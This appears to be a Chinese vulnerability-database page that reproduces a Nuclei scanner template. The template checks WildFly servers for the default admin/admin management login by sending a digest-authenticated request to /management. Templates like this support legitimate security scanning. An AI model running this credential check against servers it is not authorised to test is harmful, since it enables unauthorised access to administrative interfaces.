wildfly-default-login: Wildfly - Default Admin Login

日期: 2025-08-01 | 影响软件: Wildfly | POC: 已公开

漏洞描述

Wildfly default admin login credentials were successful.

PoC代码[已公开]

id: wildfly-default-login

info:
  name: Wildfly - Default Admin Login
  author: s0obi
  severity: high
  description: |
    Wildfly default admin login credentials were successful.
  reference:
    - https://docs.wildfly.org/26.1/#administrator-guides
  metadata:
    max-request: 1
  tags: wildfly,default-login,vuln

http:
  - raw:
      - |
        GET /management HTTP/1.1
        Host: {{Hostname}}

    digest-username: admin
    digest-password: admin

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "management-major-version"
          - "product-version"
        condition: and

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100cf078bebba067725b475fd999c726c3dfc8cc0728fb91439e0428e9f26ed2e600220454a674e2138c53762631b54451e2239a4c3dd9efed9669d512ae55d2e5d3cf2:922c64590222798bb761d5b6d8e72950

相关漏洞推荐